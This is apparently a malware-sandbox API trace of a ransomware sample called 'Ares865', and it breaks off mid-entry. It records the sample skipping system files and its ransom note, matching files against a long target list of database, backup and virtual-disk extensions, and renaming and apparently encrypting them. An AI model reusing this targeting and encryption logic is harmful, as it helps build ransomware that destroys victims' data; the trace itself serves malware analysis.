[0084.890] lstrlenW (lpString="teacher") returned 7 [0084.890] lstrcmpiW (lpString1="e22.bmp", lpString2="teacher") returned -1 [0084.890] lstrlenW (lpString="tmd") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.890] lstrlenW (lpString="tps") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.890] lstrlenW (lpString="trc") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.890] lstrlenW (lpString="trc") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.890] lstrlenW (lpString="trm") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.890] lstrlenW (lpString="udb") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.890] lstrlenW (lpString="udl") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.890] lstrlenW (lpString="usr") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.891] lstrlenW (lpString="v12") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.891] lstrlenW (lpString="vis") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.891] lstrlenW (lpString="vpd") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.891] lstrlenW (lpString="vvv") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.891] lstrlenW (lpString="wdb") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.891] lstrlenW (lpString="wmdb") returned 4 [0084.891] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.891] lstrlenW (lpString="wrk") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.891] lstrlenW (lpString="xdb") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.891] lstrlenW (lpString="xld") returned 3 [0084.891] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.891] lstrlenW (lpString="xmlff") returned 5 [0084.891] lstrcmpiW (lpString1="2.bmp", lpString2="xmlff") returned -1 [0084.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.Ares865") returned 90 [0084.891] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.ares865"), dwFlags=0x1) returned 1 [0084.893] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.893] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.893] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.894] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.894] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.894] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.896] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.899] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.900] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.900] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.901] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.901] CloseHandle (hObject=0x15c) returned 1 [0084.901] CloseHandle (hObject=0x118) returned 1 [0084.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.902] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd0b61fb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="aoldtz.exe") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2=".") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="..") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="windows") returned -1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="bootmgr") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="temp") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="pagefile.sys") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="boot") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="ids.txt") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="ntuser.dat") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="perflogs") returned 1 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2="MSBuild") returned 1 [0084.902] lstrlenW (lpString="usertile23.bmp") returned 14 [0084.902] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 82 [0084.902] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile23.bmp" | out: lpString1="usertile23.bmp") returned="usertile23.bmp" [0084.902] lstrlenW (lpString="usertile23.bmp") returned 14 [0084.902] lstrlenW (lpString="Ares865") returned 7 [0084.902] lstrcmpiW (lpString1="e23.bmp", lpString2="Ares865") returned 1 [0084.902] lstrlenW (lpString=".dll") returned 4 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2=".dll") returned 1 [0084.902] lstrlenW (lpString=".lnk") returned 4 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2=".lnk") returned 1 [0084.902] lstrlenW (lpString=".ini") returned 4 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2=".ini") returned 1 [0084.902] lstrlenW (lpString=".sys") returned 4 [0084.902] lstrcmpiW (lpString1="usertile23.bmp", lpString2=".sys") returned 1 [0084.902] lstrlenW (lpString="usertile23.bmp") returned 14 [0084.902] lstrlenW (lpString="bak") returned 3 [0084.902] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.902] lstrlenW (lpString="ba_") returned 3 [0084.902] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.903] lstrlenW (lpString="dbb") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.903] lstrlenW (lpString="vmdk") returned 4 [0084.903] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.903] lstrlenW (lpString="rar") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.903] lstrlenW (lpString="zip") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.903] lstrlenW (lpString="tgz") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.903] lstrlenW (lpString="vbox") returned 4 [0084.903] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.903] lstrlenW (lpString="vdi") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.903] lstrlenW (lpString="vhd") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.903] lstrlenW (lpString="vhdx") returned 4 [0084.903] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.903] lstrlenW (lpString="avhd") returned 4 [0084.903] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.903] lstrlenW (lpString="db") returned 2 [0084.903] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.903] lstrlenW (lpString="db2") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.903] lstrlenW (lpString="db3") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.903] lstrlenW (lpString="dbf") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.903] lstrlenW (lpString="mdf") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.903] lstrlenW (lpString="mdb") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.903] lstrlenW (lpString="sql") returned 3 [0084.903] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.903] lstrlenW (lpString="sqlite") returned 6 [0084.903] lstrcmpiW (lpString1="23.bmp", lpString2="sqlite") returned -1 [0084.903] lstrlenW (lpString="sqlite3") returned 7 [0084.903] lstrcmpiW (lpString1="e23.bmp", lpString2="sqlite3") returned -1 [0084.904] lstrlenW (lpString="sqlitedb") returned 8 [0084.904] lstrcmpiW (lpString1="le23.bmp", lpString2="sqlitedb") returned -1 [0084.904] lstrlenW (lpString="xml") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.904] lstrlenW (lpString="$er") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.904] lstrlenW (lpString="4dd") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.904] lstrlenW (lpString="4dl") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.904] lstrlenW (lpString="^^^") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.904] lstrlenW (lpString="abs") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.904] lstrlenW (lpString="abx") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.904] lstrlenW (lpString="accdb") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accdb") returned -1 [0084.904] lstrlenW (lpString="accdc") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accdc") returned -1 [0084.904] lstrlenW (lpString="accde") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accde") returned -1 [0084.904] lstrlenW (lpString="accdr") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accdr") returned -1 [0084.904] lstrlenW (lpString="accdt") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accdt") returned -1 [0084.904] lstrlenW (lpString="accdw") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accdw") returned -1 [0084.904] lstrlenW (lpString="accft") returned 5 [0084.904] lstrcmpiW (lpString1="3.bmp", lpString2="accft") returned -1 [0084.904] lstrlenW (lpString="adb") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.904] lstrlenW (lpString="adb") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.904] lstrlenW (lpString="ade") returned 3 [0084.904] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.904] lstrlenW (lpString="adf") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.905] lstrlenW (lpString="adn") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.905] lstrlenW (lpString="adp") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.905] lstrlenW (lpString="alf") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.905] lstrlenW (lpString="ask") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.905] lstrlenW (lpString="btr") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.905] lstrlenW (lpString="cat") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.905] lstrlenW (lpString="cdb") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.905] lstrlenW (lpString="ckp") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.905] lstrlenW (lpString="cma") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.905] lstrlenW (lpString="cpd") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.905] lstrlenW (lpString="dacpac") returned 6 [0084.905] lstrcmpiW (lpString1="23.bmp", lpString2="dacpac") returned -1 [0084.905] lstrlenW (lpString="dad") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.905] lstrlenW (lpString="dadiagrams") returned 10 [0084.905] lstrcmpiW (lpString1="tile23.bmp", lpString2="dadiagrams") returned 1 [0084.905] lstrlenW (lpString="daschema") returned 8 [0084.905] lstrcmpiW (lpString1="le23.bmp", lpString2="daschema") returned 1 [0084.905] lstrlenW (lpString="db-journal") returned 10 [0084.905] lstrcmpiW (lpString1="tile23.bmp", lpString2="db-journal") returned 1 [0084.905] lstrlenW (lpString="db-shm") returned 6 [0084.905] lstrcmpiW (lpString1="23.bmp", lpString2="db-shm") returned -1 [0084.905] lstrlenW (lpString="db-wal") returned 6 [0084.905] lstrcmpiW (lpString1="23.bmp", lpString2="db-wal") returned -1 [0084.905] lstrlenW (lpString="dbc") returned 3 [0084.905] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.905] lstrlenW (lpString="dbs") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.906] lstrlenW (lpString="dbt") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.906] lstrlenW (lpString="dbv") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.906] lstrlenW (lpString="dbx") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.906] lstrlenW (lpString="dcb") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.906] lstrlenW (lpString="dct") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.906] lstrlenW (lpString="dcx") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.906] lstrlenW (lpString="ddl") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.906] lstrlenW (lpString="dlis") returned 4 [0084.906] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.906] lstrlenW (lpString="dp1") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.906] lstrlenW (lpString="dqy") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.906] lstrlenW (lpString="dsk") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.906] lstrlenW (lpString="dsn") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.906] lstrlenW (lpString="dtsx") returned 4 [0084.906] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.906] lstrlenW (lpString="dxl") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.906] lstrlenW (lpString="eco") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.906] lstrlenW (lpString="ecx") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.906] lstrlenW (lpString="edb") returned 3 [0084.906] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.906] lstrlenW (lpString="epim") returned 4 [0084.906] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.906] lstrlenW (lpString="fcd") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.907] lstrlenW (lpString="fdb") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.907] lstrlenW (lpString="fic") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.907] lstrlenW (lpString="flexolibrary") returned 12 [0084.907] lstrcmpiW (lpString1="ertile23.bmp", lpString2="flexolibrary") returned -1 [0084.907] lstrlenW (lpString="fm5") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.907] lstrlenW (lpString="fmp") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.907] lstrlenW (lpString="fmp12") returned 5 [0084.907] lstrcmpiW (lpString1="3.bmp", lpString2="fmp12") returned -1 [0084.907] lstrlenW (lpString="fmpsl") returned 5 [0084.907] lstrcmpiW (lpString1="3.bmp", lpString2="fmpsl") returned -1 [0084.907] lstrlenW (lpString="fol") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.907] lstrlenW (lpString="fp3") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.907] lstrlenW (lpString="fp4") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.907] lstrlenW (lpString="fp5") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.907] lstrlenW (lpString="fp7") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.907] lstrlenW (lpString="fpt") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.907] lstrlenW (lpString="frm") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.907] lstrlenW (lpString="gdb") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.907] lstrlenW (lpString="gdb") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.907] lstrlenW (lpString="grdb") returned 4 [0084.907] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.907] lstrlenW (lpString="gwi") returned 3 [0084.907] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.908] lstrlenW (lpString="hdb") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.908] lstrlenW (lpString="his") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.908] lstrlenW (lpString="ib") returned 2 [0084.908] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.908] lstrlenW (lpString="idb") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.908] lstrlenW (lpString="ihx") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.908] lstrlenW (lpString="itdb") returned 4 [0084.908] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.908] lstrlenW (lpString="itw") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.908] lstrlenW (lpString="jet") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.908] lstrlenW (lpString="jtx") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.908] lstrlenW (lpString="kdb") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.908] lstrlenW (lpString="kexi") returned 4 [0084.908] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.908] lstrlenW (lpString="kexic") returned 5 [0084.908] lstrcmpiW (lpString1="3.bmp", lpString2="kexic") returned -1 [0084.908] lstrlenW (lpString="kexis") returned 5 [0084.908] lstrcmpiW (lpString1="3.bmp", lpString2="kexis") returned -1 [0084.908] lstrlenW (lpString="lgc") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.908] lstrlenW (lpString="lwx") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.908] lstrlenW (lpString="maf") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.908] lstrlenW (lpString="maq") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.908] lstrlenW (lpString="mar") returned 3 [0084.908] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.908] lstrlenW (lpString="marshal") returned 7 [0084.908] lstrcmpiW (lpString1="e23.bmp", lpString2="marshal") returned -1 [0084.909] lstrlenW (lpString="mas") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.909] lstrlenW (lpString="mav") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.909] lstrlenW (lpString="maw") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.909] lstrlenW (lpString="mdbhtml") returned 7 [0084.909] lstrcmpiW (lpString1="e23.bmp", lpString2="mdbhtml") returned -1 [0084.909] lstrlenW (lpString="mdn") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.909] lstrlenW (lpString="mdt") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.909] lstrlenW (lpString="mfd") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.909] lstrlenW (lpString="mpd") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.909] lstrlenW (lpString="mrg") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.909] lstrlenW (lpString="mud") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.909] lstrlenW (lpString="mwb") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.909] lstrlenW (lpString="myd") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.909] lstrlenW (lpString="ndf") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.909] lstrlenW (lpString="nnt") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.909] lstrlenW (lpString="nrmlib") returned 6 [0084.909] lstrcmpiW (lpString1="23.bmp", lpString2="nrmlib") returned -1 [0084.909] lstrlenW (lpString="ns2") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.909] lstrlenW (lpString="ns3") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.909] lstrlenW (lpString="ns4") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.909] lstrlenW (lpString="nsf") returned 3 [0084.909] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.910] lstrlenW (lpString="nv") returned 2 [0084.910] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.910] lstrlenW (lpString="nv2") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.910] lstrlenW (lpString="nwdb") returned 4 [0084.910] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.910] lstrlenW (lpString="nyf") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.910] lstrlenW (lpString="odb") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.910] lstrlenW (lpString="odb") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.910] lstrlenW (lpString="oqy") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.910] lstrlenW (lpString="ora") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.910] lstrlenW (lpString="orx") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.910] lstrlenW (lpString="owc") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.910] lstrlenW (lpString="p96") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.910] lstrlenW (lpString="p97") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.910] lstrlenW (lpString="pan") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.910] lstrlenW (lpString="pdb") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.910] lstrlenW (lpString="pdm") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.910] lstrlenW (lpString="pnz") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.910] lstrlenW (lpString="qry") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.910] lstrlenW (lpString="qvd") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.910] lstrlenW (lpString="rbf") returned 3 [0084.910] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.911] lstrlenW (lpString="rctd") returned 4 [0084.911] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.911] lstrlenW (lpString="rod") returned 3 [0084.911] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.911] lstrlenW (lpString="rodx") returned 